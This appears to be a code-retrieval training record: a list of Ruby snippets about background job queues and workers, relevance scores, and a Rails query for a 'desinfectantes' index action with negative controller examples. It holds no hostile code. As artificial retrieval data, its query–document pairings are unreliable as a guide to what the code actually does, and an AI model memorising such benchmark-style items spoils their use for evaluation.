"def simulate_queue_worker(break_on_complete: false, quiet_polling: true)\n raise NotImplementedError, \"not implemented in production mode\" if Rails.env.production?\n\n deliver_on = MiqQueue.arel_table[:deliver_on]\n\n stale_entries = MiqQueue.where(:state => MiqQueue::STATE_DEQUEUE).count\n puts \"NOTE: there are #{stale_entries} entries on the queue that are in progress\" if stale_entries > 0\n\n future_entries = MiqQueue.where(deliver_on.gt(1.minute.from_now)).count\n puts \"NOTE: there are #{future_entries} entries in the future\" if future_entries > 0\n\n loop do\n q = with_console_sql_logging_level(quiet_polling ? 1 : ActiveRecord::Base.logger.level) do\n MiqQueue.where.not(:state => MiqQueue::STATE_DEQUEUE)\n .where(deliver_on.eq(nil).or(deliver_on.lteq(Time.now.utc)))\n .where.not(:queue_name => \"miq_server\")\n .order(:priority, :id)\n .first\n end\n if q\n begin\n q.update!(:state => MiqQueue::STATE_DEQUEUE, :handler => MiqServer.my_server)\n rescue ActiveRecord::StaleObjectError\n else\n puts \"\\e[33;1m\\n** Delivering #{MiqQueue.format_full_log_msg(q)}\\n\\e[0;m\"\n q.deliver_and_process\n end\n else\n break_on_complete ? break : sleep(1.second)\n end\n break if break_on_complete.kind_of?(Integer) && (break_on_complete -= 1) <= 0\n end\n end",
"def perform_later(*args, **options)\n __debug_job(__method__) { \"options = #{item_inspect(options)}\" } # TODO: remove\n job_warn { \"ignoring method args #{args.inspect}\" } if args.present?\n enqueue(options)\n end",
"def after_enqueue_scale_workers_up(*args)\n if HerokuScaler.heroku?\n scaler = HerokuScaler.new(@queue)\n scaler.workers = 1 if job_count > 0\n end\n end",
"def perform\n raise RuntimeError, \"Worker Implementations should override this\"\n end",
"def retry_options\n {tries: 15, sleep: 1}\n end",
"def setup\n Sidekiq::Worker.clear_all\n end",
"def initialize options = {}\n symbolize_keys! options\n\n @queue = Queue.new\n @write_key = options[:write_key]\n @max_queue_size = options[:max_queue_size] || Defaults::Queue::MAX_SIZE\n @options = options\n @worker_mutex = Mutex.new\n @worker = Worker.new @queue, @write_key, @options\n\n check_write_key!\n\n at_exit { @worker_thread && @worker_thread[:should_exit] = true }\n end",
"def apply_async!(queue: 'eventually')\n super\n end",
"def sidekiq_payload(options, message)\n {\n 'queue' => options[:queue],\n 'jid' => SecureRandom.hex(12),\n 'enqueued_at' => Time.now.to_f,\n 'class' => options[:worker],\n 'args' => [message],\n 'backtrace' => true,\n 'retry' => 3\n }.to_json\n end",
"def run\n super\n\n config = _get_task_config \"control/collection_processor\"\n\n @sqs = Aws::SQS::Client.new({\n region: 'us-east-1',\n access_key_id: config[\"aws_access_key\"],\n secret_access_key: config[\"aws_secret_access_key\"]\n })\n\n @control_queue_uri = config[\"control_queue_uri\"]\n @status_queue_uri = config[\"status_queue_uri\"]\n sleep_interval = config[\"sleep\"] || 10\n max_seconds = config[\"max_seconds\"] || 36000\n\n handler = config[\"handler\"]\n\n # connect to the configured amazon queue & Grab one\n _set_status :available, nil\n instruction_data = nil\n iteration = 0\n while true\n\n # loop until we have something\n while !instruction_data\n\n _log \"Attempting to get an instruction from the queue!\"\n instruction_data = _get_queued_instruction # try again\n\n # kick it off if we got one, and break out of this loop\n if instruction_data\n _log \"[+] Executing #{instruction_data[\"id\"]} for #{sleep_interval} seconds! (expire in: ~#{max_seconds - (iteration * sleep_interval) }s)\"\n _set_status :start, \"#{instruction_data[\"id\"]}\"\n _execute_instruction(instruction_data)\n else\n _log \"Nothing to do, waiting!\"\n sleep sleep_interval\n end\n\n end\n\n # hold tight\n sleep sleep_interval\n\n # determine how we're doing\n task_count_left = _tasks_left\n seconds_elapsed = iteration * sleep_interval\n done = (iteration > 10 && task_count_left == 0 ) || (seconds_elapsed > max_seconds)\n\n _log \"Seconds elapsed: #{seconds_elapsed}\" if iteration % 10 == 0\n _log \"Tasks left: #{task_count_left}\" if iteration % 10 == 0\n\n if done\n _log_good \"Done with #{instruction_data[\"id\"]} after #{seconds_elapsed}s\"\n _set_status :end, {\n \"id\" => \"#{instruction_data[\"id\"]}\",\n \"elapsed\" => \"#{seconds_elapsed}\",\n \"entities\" => \"#{Intrigue::Model::Project.first(:name => instruction_data[\"id\"]).entities.count}\"\n }\n\n _log_good \"#{instruction_data[\"id\"]}\"\n _run_handlers instruction_data\n _set_status :sent, \"#{instruction_data[\"id\"]}\"\n\n instruction_data = nil\n iteration = -1\n\n end\n\n iteration +=1\n end\n\n end",
"def initialize(adapter_factory, options={})\n @adapter_factory = adapter_factory\n options = @@default_options.merge(options)\n @stopped = false\n @name = options[:name] || Qwirk::DEFAULT_NAME\n @poll_time = options[:poll_time] || 3.0\n @stop_time = options[:stop_time]\n @worker_configs = []\n @env = options[:env]\n @worker_options = parse_worker_file(options[:worker_file])\n @persist_file = options[:persist_file]\n @persist_options = (@persist_file && File.exist?(@persist_file)) ? YAML.load_file(@persist_file) : {}\n\n BaseWorker.worker_classes.each do |worker_class|\n worker_class.each_config(adapter_factory.worker_config_class) do |config_name, extended_worker_config_class, default_options|\n # Least priority is config default_options defined in the Worker class, then the workers.yml file,\n # highest priority is persist_file (ad-hoc changes made manually)\n options = {}\n options = options.merge(@worker_options[config_name]) if @worker_options[config_name]\n options = options.merge(@persist_options[config_name]) if @persist_options[config_name]\n worker_config = extended_worker_config_class.new(adapter_factory, config_name, self, worker_class, default_options, options)\n bean_add_child(config_name, worker_config)\n @worker_configs << worker_config\n end\n end\n\n start_timer_thread\n at_exit { stop }\n end",
"def on_backends_sidekiq_base_worker_perform(event)\n count = event[:consumer].send(:params_batch).size\n topic = event[:consumer].topic.name\n time = event[:time]\n info \"Sidekiq processing of topic #{topic} with #{count} messages took #{time} ms\"\n end",
"def requeue\n Sidekiq.redis { |conn| conn.rpush(QueueName.expand(queue_name), job) }\n end",
"def worker_init\n raise \"Invalid worker name\" if !worker_name\n Thread.abort_on_exception = true\n\n # stores the job key of currently running job\n Thread.current[:job_key] = nil\n initialize_logger\n\n @thread_pool = ThreadPool.new(self,pool_size || 20,@logger)\n t_worker_key = worker_options && worker_options[:worker_key]\n\n @cache = ResultStorage.new(worker_name,t_worker_key,BDRB_CONFIG[:backgroundrb][:result_storage])\n\n if(worker_options && worker_options[:schedule] && no_auto_load)\n load_schedule_from_args\n elsif(BDRB_CONFIG[:schedules] && BDRB_CONFIG[:schedules][worker_name.to_sym])\n @my_schedule = BDRB_CONFIG[:schedules][worker_name.to_sym]\n new_load_schedule if @my_schedule\n end\n if respond_to?(:create)\n invoke_user_method(:create,worker_options[:data])\n end\n if run_persistent_jobs?\n add_periodic_timer(persistent_delay.to_i) {\n begin\n check_for_enqueued_tasks\n rescue Object => e\n puts(\"Error while running persistent task : #{Time.now}\")\n log_exception(e.backtrace)\n end\n }\n end\n write_pid_file(t_worker_key)\n end",
"def perform args={each_minute: RUN_EVERY}\n # call an other job\n CowsayJob.perform_later # topic: 'ru'\n \n self.class.perform_later wait: args[:each_minute].minute # re-queue\n end",
"def fail_fast\n return nil unless published?\n\n @fail_fast ||= Integer(@redis.hget(key_queue_config, \"fail_fast\"))\n end",
"def consumer_job_queue=(val)\n config.consumer_job_queue = val.to_sym\n # Refresh the consumer job queue\n Rimless::ConsumerJob.sidekiq_options(\n queue: Rimless.configuration.consumer_job_queue\n )\n end",
"def queue_worker_once_command(tries)\n if version < \"5.3.0\"\n \"php artisan queue:work --tries=#{tries}\"\n else\n \"php artisan queue:work --once --tries=#{tries}\"\n end\n end",
"def requeue_throttled\n Sidekiq.redis { |conn| conn.lpush(QueueName.expand(queue_name), job) }\n end",
"def be_worker\n before_work\n super\n end",
"def default_configuration!(config, options = {})\n options[:threads] ||= config.default_threads\n config.registry.each do |name, klass|\n klass.available_jobs.each do |method|\n add_worker Woodhouse::Layout::Worker.new(name, method, options)\n end\n end\n end",
"def worker_config\n if BDRB_CONFIG[:workers] && BDRB_CONFIG[:workers][worker_name.to_sym]\n BDRB_CONFIG[:workers][worker_name.to_sym]\n else\n {}\n end\n end",
"def before_perform_ensure_proper_worker(*args)\n if args.last.is_a?(::Resque::Worker)\n self.worker = args.last\n else\n raise \"Resque::Job#args has not been overriden to pass worker as last argument.\"\n end\n \n if required_worker_class && worker.class.name != required_worker_class\n raise ::Resque::Job::DontPerform\n end\n end",
"def retry\n self.class.enqueue(\n object,\n method_name,\n *(args << {\n :job_options => {\n :parent_id => parent_id || id,\n :run_at => Time.now + times_failed ** 4,\n :priority => priority\n }\n })\n )\n end",
"def worker_pool; end",
"def worker_pool; end",
"def queue_select_limit\n (\n options[:queue_select_limit] ||\n rails_config[:queue_select_limit] ||\n env['GOOD_JOB_QUEUE_SELECT_LIMIT']\n )&.to_i\n end",
"def queue(queue)\n @configuration.queue = queue\n end",
"def ignore_slow_queue_if_disabled\n propono_config.slow_queue_enabled = false\n\n main_queue = mock\n @listener.stubs(main_queue: main_queue)\n slow_queue = mock\n @listener.stubs(slow_queue: slow_queue)\n\n @listener.expects(:read_messages_from_queue).with(main_queue, propono_config.num_messages_per_poll).returns(false)\n @listener.expects(:read_messages_from_queue).with(slow_queue, 1).never\n @listener.send(:read_messages)\n end",
"def configure_command\n load_configuration_file\n return false unless determine_products_to_parse\n return false unless determine_product_version_to_parse\n\n determine_number_of_attempts\n setup_destination_directory\n Workers.pool.resize(10)\n true\n end",
"def perform(*args)\n if Service.get_service.jobs_enabled?\n # Job processing is enabled.\n Delayed::Worker.logger.info \"---> running #{self.class}(#{args.join(',')}) on #{self.queue_name} at priority #{Process::getpriority(Process::PRIO_PROCESS, 0)}\"\n start_time = Time.current\n perform_if_enabled(*args)\n Delayed::Worker.logger.info \"<--- finished #{self.class} after #{time_ago_in_words(start_time)}\"\n else\n # Resubmit the job with the required parameters after the specified delay. If the inline adapter is being used, we just ignore this.\n Delayed::Worker.logger.warn \"**** job processing disabled for #{self.class}\"\n begin\n self.class.set(wait: DISABLED_RETRY_INTERVAL).perform_later(*args)\n rescue NotImplementedError => _e\n Delayed::Worker.logger.error \"**** no job queue available for future job #{self.class}\"\n end\n end\n end",
"def job_priority\n case params[:queue]\n when 'high'\n 0\n when 'medium'\n 1\n when 'low'\n 2\n end\n end",
"def enqueue\n Karafka.logger.info(\"Enqueuing #{self.class} - #{params}\")\n Karafka::Worker.perform_async(params)\n end",
"def worker_timeout(timeout); end",
"def run\n log_info \"Connecting to MQ...\"\n \n MessageQueue.start do\n log_info \"worker #{MQ.id} started\"\n \n # Set prefetch(1) as suggested by Amman Gupta\n prefetch = 1\n MQ.prefetch(prefetch)\n EM.threadpool_size = prefetch # Default: 20\n \n process_queue \n \n # Make sure requeue timer doesn't cause BackupSourceExecutionFlood errors\n #EM.add_periodic_timer(@@consecutiveJobExecutionTime*2) { long_q.recover(:requeue => true) }\n\n end # MessageQueue.start\n end",
"def max_queue_threads\n 1\n end",
"def with_background_worker_disabled(&block)\n original_background_worker_threads = configuration.background_worker_threads\n configuration.background_worker_threads = 0\n\n block.call\n ensure\n configuration.background_worker_threads = original_background_worker_threads\n end",
"def poll queue=main_queue\n limit = max_limit - busy\n\n # 100% utilization of threads\n if limit == 0\n return Logger.warn \"Waiting for another loop - 100% utilization of workers\"\n end\n\n # Wait over 50% utilization\n if threshold = GuaranteedQueue.config[:utilization_threshold]\n if (busy.to_f / max_limit) > threshold\n return Logger.warn \"Waiting for another loop - past utilization threshold of #{threshold}.\"\n end\n end\n\n begin\n Logger.info \"Receiving up to #{limit} messages on #{queue_name(queue)} (#{busy}/#{limit} threads are busy)\"\n queue.receive_message(:limit => limit) do |message|\n handle message\n end\n rescue SignalException => e\n raise e\n rescue Exception => e\n Logger.error $!\n poll!(restart: true)\n end\n end",
"def default_task_heartbeat_timeout; Float::INFINITY; end",
"def setup_amqp\n @channel = TomQueue.bunny.create_channel\n @channel.prefetch(0)\n\n @exchange = channel.fanout(\"#{prefix}.work.deferred\",\n :durable => true,\n :auto_delete => false)\n\n @queue = channel.queue(\"#{prefix}.work.deferred\",\n :durable => true,\n :auto_delete => false).bind(exchange.name)\n end",
"def initialize(routing, client_class)\n super\n WorklingRabbitMQSubscriber.sleep_time = Workling.config[:sleep_time] || 0.2\n end",
"def default_options\n { throttle: 'throttle' }\n end",
"def work_off_queue\n if Delayed::Worker.instance_methods.detect{|iv| iv.to_s == \"work_off\" }\n Delayed::Worker.send :public, :work_off\n worker = Delayed::Worker.new(:max_priority => nil, :min_priority => nil, :quiet => true)\n worker.work_off\n else\n Delayed::Job.work_off\n end\n end",
"def should_queue?\n @options[:offline_queueing] && @offline_handler.queueing?\n end",
"def call(worker, msg, queue, _ = nil)\n yield\n ensure\n monitor.active_now!\n monitor.wait_for_downscale(@scaler, @strategy, @system)\n end",
"def optimization_options\n @options ||= @workers.each_with_object({}) do |worker, hash|\n hash[worker.to_sym] = supported_worker?(worker) && command_exists?(worker)\n end\n end",
"def queued_tasks(options, analysis_type)\n # Initialize variables for queue dependent actions\n submit_time = Time.now #change to submit time for analysis\n rdata_flag = options[:rdata]\n csv_flag = options[:csv]\n zip_flag = options[:zip]\n download_flag = false\n stop_flag = options[:stop]\n kill_flag = options[:kill]\n warnings = []\n start_wait = options[:start_wait]\n analysis_wait = options[:analysis_wait]\n analysis_type = 'batch_run' if OpenStudio::Analysis::ServerApi::BATCH_RUN_METHODS.include? analysis_type\n\n # Verify download directories and set flags to true should they exist\n if rdata_flag || csv_flag || zip_flag\n if !File.exist? options[:download_directory]\n puts \"INFO: MKDIR -- Making new directory for download results at #{options[:download_directory]}\"\n Dir.mkdir options[:download_directory]\n download_flag = true\n else\n download_flag = true\n end\n end\n\n # Hash commands for run_queued_tasks and warning messages\n flags = {download: download_flag, rdata: rdata_flag, csv: csv_flag, zip: zip_flag, stop: stop_flag, kill: kill_flag}\n completed = {rdata: nil, csv: nil, zip: nil, stop: nil, kill: nil}\n\n # Execute queued tasks should they exist with a Timeout\n puts 'INFO: ANALYSIS STATUS -- Waiting for analysis to start.'\n while Time.now - submit_time < start_wait\n server_status = @server_api.get_analysis_status(@analysis_id, analysis_type)\n if server_status == 'started'\n puts 'INFO: ANALYSIS STATUS -- Analysis has started. Waiting for analysis to complete.'\n returned = run_queued_tasks(analysis_type, options[:download_directory], flags, analysis_wait)\n returned ||= {}\n completed.merge! returned\n break\n elsif server_status == 'failed'\n puts 'WARN: ANALYSIS STATUS -- The analysis status has transitioned to failed. Attempting to execute queued tasks.'\n returned = run_queued_tasks(analysis_type, options[:download_directory], flags, analysis_wait)\n completed.merge! returned\n break\n else\n sleep 1\n end\n end\n\n # Warn if flags were set to true but code not executed.\n if flags[:rdata]\n warnings << 'WARN: TIMEOUT -- RData results were not downloaded due to timeout' unless completed[:rdata]\n end\n\n if flags[:csv]\n warnings << 'WARN: TIMEOUT -- CSV results were not downloaded due to timeout' unless completed[:csv]\n end\n\n if flags[:zip]\n warnings << 'WARN: TIMEOUT -- Zipped files were not downloaded due to timeout' unless completed[:zip]\n end\n\n if flags[:stop]\n warnings << 'WARN: TIMEOUT -- Instance was not stopped due to timeout' unless completed[:stop]\n end\n\n if flags[:kill]\n warnings << 'WARN: TIMEOUT -- Instance was not killed due to timeout' unless completed[:kill]\n end\n\n warnings.join(\". \") if warnings != []\n\nend",
"def perform\n begin\n data = RecoverJob.hash_strings_to_sym(options)\n job = RecoverJob.create_job_by_configuration(@uuid, data)\n job.execute\n rescue => e\n RecoverJob.logger.error(e.message)\n RecoverJob.logger.error(e.backtrace.join(\"\\n\"))\n # reraise exception so that caller (resque worker?) recognizes errors\n raise e\n end\n end",
"def setup\n setup_requeue_queue\n consume_requeue\n setup_retry_queues\n end",
"def trigger_requeue!\n false\n end",
"def e\n @queue << \"enable\"\n end",
"def worker_set(limit = 5, options={})\n #TODO: add priority to this.\n options = {:lock_name=>nil,:limit=>limit, :order=>[:time.asc]}.merge(options)\n current.all(options)\n end",
"def async_producer(delivery_interval: 0, delivery_threshold: 0, max_queue_size: 1000, max_retries: -1, retry_backoff: 0, **options)\n producer(**options)\n end",
"def set_admin_sidekiq_exception\n @admin_sidekiq_exception = Admin::SidekiqException.find(params[:id])\n end",
"def setup\n SidekiqPrometheus::Metrics.register_sidekiq_job_metrics\n SidekiqPrometheus::Metrics.register_sidekiq_gc_metric if gc_metrics_enabled?\n SidekiqPrometheus::Metrics.register_sidekiq_worker_gc_metrics if gc_metrics_enabled? && periodic_metrics_enabled?\n SidekiqPrometheus::Metrics.register_sidekiq_global_metrics if global_metrics_enabled? && periodic_metrics_enabled?\n sidekiq_setup\n end",
"def base_opts\r\n { attempt: 1, retry: false }\r\n end",
"def perform\n # Sidekiq would not be able to get an instance as an argument\n\n\n # Do something later\n puts \"Starting to do something which takes time...\"\n sleep(5)\n puts \"Finished my time-consuming process!\"\n end",
"def queue\n\n @queue ||= channel.queue(*(opt('queue') || [ '' ]))\n end",
"def simple_sidekiq_delay_for(interval, options = {})\n Proxy.new(simple_delayed_worker, self, options.merge('at' => Time.now.to_f + interval.to_f))\n end",
"def run(worker = 1)\n Rails.logger = Logger.new(\"#{Rails.root.to_s}/log/worker-#{worker}.log\", 1, 5242880)\n Delayed::Worker.logger = Rails.logger\n Delayed::Worker.logger.level = Logger::DEBUG\n # label the process with worker title\n puts \"Worker #{worker} process\"\n \n # set the worker attribute to the input value\n @worker = worker\n # label if testing should continue (basically should test forever until the worker quits, could be used to attach a database value and terminate workers remotely.)\n testing = true\n \n while(testing == true)\n @priority = test_order(@worker)\n reset_old_tests(@worker)\n check_schedule() if(@worker == 1)\n try_different_browser = false\n @hub_up = true\n # mark this process name\n #Rails.logger.info \"--- worker #{@worker} ---\"\n current_test = nil\n current_tests = nil\n sleep(2)\n #Rails.logger.info \"Checking for tests\"\n\n # set to empty hash\n current_tests = find_current_tests(@priority)\n \n begin\n if(current_tests.first().nil?)\n #Rails.logger.info \"No Tests to run\"\n raise \"No Tests to run\"\n else\n Rails.logger.info \"- Getting first test from list\"\n current_test = current_tests.first\n Rails.logger.info \"- No Tests to run\"\n begin\n current_test_driver = current_test.Driver\n rescue\n current_test_driver = current_test.driver\n current_test_driver = \"firefox\" if current_test_driver.nil?\n\n end\n Rails.logger.info \"- Checking for browser availability\"\n\n begin\n GridUtilities.browser_available(host: Grid_Processes.where('role = ?', \"hub\").first.ip, port: Grid_Processes.where('role = ?', \"hub\").first.port, driver_name: current_test_driver) if(current_test_driver.include?('grid'))\n rescue => e\n Rails.logger.info e.message\n Rails.logger.info e.backtrace\n @hub_up = false\n end\n\n if(@hub_up)\n if current_test_driver.include?('grid')\n if(GridUtilities.browser_available(host: Grid_Processes.where('role = ?', \"hub\").first.ip, port: Grid_Processes.where('role = ?', \"hub\").first.port, driver_name: current_test_driver))\n if(current_test[\"workerassigned\"] == nil)\n current_test[\"workerassigned\"] = @worker\n current_test.save!\n end\n puts \"- Worker #{@worker} can run test ##{current_test.id}\"\n if(current_test[\"testtype\"].downcase == 'buyflow')\n puts \"- Running Order Purchase TestCase #{current_test['id']}\"\n buyflow(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('pixel'))\n puts \"- Running Pixels TestCase #{current_test['id']}\"\n pixel(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('vanity'))\n puts \"- Running Vanity TestCase #{current_test['id']}\"\n vanity(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('uci'))\n puts \"- Running UCI TestCase #{current_test['id']}\"\n uci(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('seo'))\n puts \"- Running seo TestCase #{current_test['id']}\"\n seo(current_test)\n end\n else\n Rails.logger.info \"No browser available for this test case\"\n raise \"no_browser\"\n end\n else\n if(current_test[\"workerassigned\"] == nil)\n current_test[\"workerassigned\"] = @worker\n current_test.save!\n end\n Rails.logger.info \"- Worker #{@worker} can run test ##{current_test.id}\"\n if(current_test[\"testtype\"].downcase == 'buyflow')\n puts \"- Running Order Purchase TestCase #{current_test['id']}\"\n buyflow(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('pixel'))\n puts \"- Running Pixels TestCase #{current_test['id']}\"\n pixel(current_test)\n end\n 
if(current_test[\"testtype\"].downcase.include?('vanity'))\n puts \"- Running Vanity TestCase #{current_test['id']}\"\n vanity(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('uci'))\n puts \"- Running UCI TestCase #{current_test['id']}\"\n uci(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('seo'))\n puts \"- Running seo TestCase #{current_test['id']}\"\n seo(current_test)\n end\n end\n end\n current_test = nil\n end\n rescue ActiveRecord::StaleObjectError => e\n Rails.logger.info e.message\n Rails.logger.info e.backtrace if e.backtrace\n rescue Net::ReadTimeout => e\n Rails.logger.info \"Caught Net::ReadTimeout\"\n reset_old_tests(@worker)\n # catch browser communication failures\n Rails.logger.info e.message\n Rails.logger.info e.backtrace if e.backtrace\n # tell this worker to try another browser for now\n current_tests = Testrun.where(:status => \"Not Started\", :workerassigned => nil).where.not(:Driver => current_test.Driver)\n current_test = nil\n #try_different_browser = true\n retry\n rescue ActiveRecord::RecordNotFound => e\n Rails.logger.info \"Caught RecordNotFound\"\n Rails.logger.info \"#{e.message}\"\n sleep(2)\n rescue => e\n if(e.message == \"no_browser\")\n puts \"Caught no_browser\"\n Rails.logger.info 'No #{current_test.Driver} browser was found for this test run.'\n current_tests = Testrun.where(:status => \"Not Started\", :workerassigned => nil).where.not(:Driver => current_test.Driver)\n current_test = nil\n try_different_browser = true\n elsif(e.message == \"No Tests to run\")\n puts \"Caught 'No Tests to run'\"\n try_different_browser = false\n sleep(2)\n else\n Rails.logger.info \"Run Completed\"\n try_different_browser = false\n Rails.logger.info \"#{e.message}\"\n Rails.logger.info \"#{e.backtrace}\"\n sleep(2)\n if(current_test)\n current_test[\"result\"] = \"Fail\"\n current_test[\"status\"] = \"Complete\"\n current_test[\"Notes\"] = e.message + \" \\n\" + e.backtrace[0]+ \" \\n\" + e.backtrace[1]\n current_test.save!\n # update_suite(current_test.test_suites) \n end\n end\n end\n begin\n Delayed_Job.where(:queue => worker).destroy_all\n rescue => e\n Rails.logger.info e.message\n end\n TestLauncher.new.delay(:queue => worker).run(worker)\n testing == false\n end\n end",
"def start_offline_queue\n @offline_handler.start if @options[:offline_queueing]\n end",
"def initialize(priority, threshold, options = {})\n self.priority = Integer(priority)\n self.threshold = Integer(threshold)\n self.queue = options[:queue]\n self.include_locked = !!options[:include_locked]\n self.include_errored = !!options[:include_errored]\n self.greater_than_priority = !!options[:greater_than_priority]\n self.name = greater_than_priority ? \"Delayed Jobs with priority higher than '#{priority}'\" : \"Delayed Jobs with priority lower than '#{priority}'\"\n end",
"def maybe_start_taskqueue_worker(app)\n if my_node.is_taskqueue_master? or my_node.is_taskqueue_slave?\n tqc = TaskQueueClient.new()\n result = tqc.start_worker(app) \n Djinn.log_info(\"Starting TaskQueue worker for app #{app}: #{result}\")\n end\n end",
"def setup_retry_queue(delay, index)\n channel.queue(\"#{queue_name}_delay_#{index}\",\n durable: !Proletariat.test_mode?,\n auto_delete: Proletariat.test_mode?,\n arguments: {\n 'x-dead-letter-exchange' => exchange_name,\n 'x-dead-letter-routing-key' => \"#{queue_name}_requeue\",\n 'x-message-ttl' => delay\n }\n ).bind(exchange, routing_key: \"#{queue_name}_delay_#{index}\")\n end",
"def configure(options, cfg)\n cfg = super(options, cfg)\n cfg[:offline_queueing] = options[:offline_queueing]\n cfg[:filter_params] = options[:filter_params]\n cfg\n end",
"def fair_queue\n worker_threaded do\n while @connected\n sleep(Ricer4::Queue::Frame::SECONDS * 2)\n @queue_lock.synchronize do\n @queue.each{|to, queue| queue.reduce_penalty }\n end\n end\n end\n end",
"def disable\n @queue << \"disable\"\n end",
"def initialize_offline_queue\n @offline_handler.init if @options[:offline_queueing]\n end",
"def default_job_options\n @default_job_options ||= if Sidekiq.respond_to?(:default_job_options)\n Sidekiq.default_job_options.stringify_keys\n else\n Sidekiq.default_worker_options.stringify_keys\n end\n end",
"def perform_with_tracking(*args)\n self.class.record_event(:dequeue)\n Rails.logger.debug \"Sidekiq perform: #{self} #{args} at #{Time.now}\"\n\n success = yield\n self.class.record_event(success ? :success : :failure)\n rescue\n self.class.record_event(:failure)\n raise\n end",
"def sidekiq_setup\n Sidekiq.configure_server do |config|\n config.server_middleware do |chain|\n chain.add SidekiqPrometheus::JobMetrics\n end\n\n if periodic_metrics_enabled?\n config.on(:startup) { SidekiqPrometheus::PeriodicMetrics.reporter.start }\n config.on(:shutdown) { SidekiqPrometheus::PeriodicMetrics.reporter.stop }\n end\n\n config.on(:startup) { SidekiqPrometheus.metrics_server }\n config.on(:shutdown) { SidekiqPrometheus.metrics_server.kill }\n end\n end",
"def set_sidekiq_plan\n @sidekiq_plan = SidekiqPlan.find(params[:id])\n end",
"def task_retry_queue\n queue = channel.queue(TASK_RETRY_QUEUE, arguments: { 'x-dead-letter-exchange': TASK_EXCHANGE })\n queue.bind(task_retry_exchange) # done this way due to bug on the testing library where bind does not return self.\n queue\n end",
"def init_queue_redis(hash)\n puts \"init_queue_redis: \" + @all_test_files_to_run.length().to_s + \" tests\"\n num = KnapsackPro::Config::Env.redis_get_num\n puts num\n @redis.rpush(hash, @all_test_files_to_run)\n @redis.rpush(hash, Array.new(@ci_node_total * num) { |i| \"0\" })\n @redis.expire(hash, KnapsackPro::Config::Env.redis_expire)\n end",
"def working!\n disque.with {|cn| cn.call :working, job_id } if disque && job_id\n end"
] |
[
"0.6407653",
"0.63067985",
"0.6157203",
"0.6040641",
"0.60173136",
"0.59270275",
"0.5883142",
"0.57842046",
"0.5768641",
"0.5762892",
"0.5700951",
"0.56808597",
"0.5645699",
"0.5617627",
"0.56069165",
"0.5602088",
"0.55706745",
"0.55668116",
"0.55640763",
"0.5551775",
"0.5533136",
"0.55212146",
"0.54334843",
"0.540741",
"0.540741",
"0.53976613",
"0.5392993",
"0.5389738",
"0.53883445",
"0.53870827",
"0.53711677",
"0.53505564",
"0.5337772",
"0.53030884",
"0.5286984",
"0.52853066",
"0.5276957",
"0.5268244",
"0.5264203",
"0.5263513",
"0.5254895",
"0.52478826",
"0.5247021",
"0.5229401",
"0.52243984",
"0.52232915",
"0.5220492",
"0.5209563",
"0.52022654",
"0.5194617",
"0.51937234",
"0.51937234",
"0.5181978",
"0.51760674",
"0.517172",
"0.5169596",
"0.51652974",
"0.51548266",
"0.5154618",
"0.515383",
"0.51384115",
"0.51233923",
"0.5120894",
"0.5117914",
"0.51131153",
"0.51115483",
"0.5111384",
"0.5101198",
"0.51002526",
"0.5094701",
"0.5077707",
"0.50524694",
"0.5039214",
"0.5039003",
"0.5036374",
"0.50324374",
"0.50262564",
"0.50227827",
"0.50225925",
"0.50180334",
"0.50167036",
"0.5011012",
"0.50040233",
"0.5001677",
"0.5000408",
"0.49894303",
"0.49880698",
"0.4981427",
"0.49733183",
"0.49670583",
"0.4965198",
"0.49627298",
"0.4950767",
"0.49499458",
"0.49496934",
"0.4934822",
"0.49311623",
"0.49267027",
"0.49261546",
"0.4925678",
"0.4924834"
] |
0.0
|
-1
|
GET /desinfectantes GET /desinfectantes.json
|
def index
@desinfectantes = Desinfectante.all
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def emergencias_en_curso\n @emergencies = Emergency.where(:estado => 'f')\n render json: @emergencies\n end",
"def index\n @detalles = Detalle.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @detalles }\n end\n end",
"def index\n @antecedentes = Antecedente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @antecedentes }\n end\n end",
"def index\n @deporte_usuarios = DeporteUsuario.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @deporte_usuarios }\n end\n end",
"def index\n @detpedidos = Detpedido.all\n end",
"def index\n @departamentos = Departamento.all\n\n render json: @departamentos\n end",
"def index\n @desafios = Desafio.all\n end",
"def set_desinfectante\n @desinfectante = Desinfectante.find(params[:id])\n end",
"def index\n @tipo_denuncia = TipoDenuncium.all\n\n render json: @tipo_denuncia\n end",
"def inactive\n @detours = Detour.find_inactive_detours\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @detours }\n end\n end",
"def index\n @deportes = Deporte.all\n render json: @deportes, status: :ok \n @deportes = Deporte.paginate(:page => params[:page])\n end",
"def show\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @deporte= set_deporte\n render json: @deporte, status: :ok\n\n end",
"def index\n @detalhes = Detalhe.all\n end",
"def solicitudes_ingresadas\n\n if params[:desde] and params[:hasta]\n institucion_nombre = current_usuario.institucion.abreviatura\n\n d_desde = Date.new(params[:desde][2].to_i, params[:desde][1].to_i, params[:desde][0].to_i)\n d_hasta = Date.new(params[:hasta][2].to_i, params[:hasta][1].to_i, params[:hasta][0].to_i)\n\n @solicitudes = Solicitud.ingresadas(d_desde, d_hasta)\n end\n\n respond_to do |format|\n format.html { render :parametros_fecha }\n format.pdf do\n render :pdf => \"solicitudes_ingresadas_#{Time.now.to_i}\", \\\n :layout => \"print.html\", \\\n :page_size => \"Legal\", \\\n :orientation => \"Landscape\", \\\n :disposition=> 'attachment',\n :encoding => 'UTF-8'\n end\n end\n end",
"def index\n @deces = Dece.all\n end",
"def consulta\n fiesta = Fiesta.all\n render json: fiesta\n end",
"def findreg\n @detalles = Detalle.find(params[:id])\n render json: @detalles\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
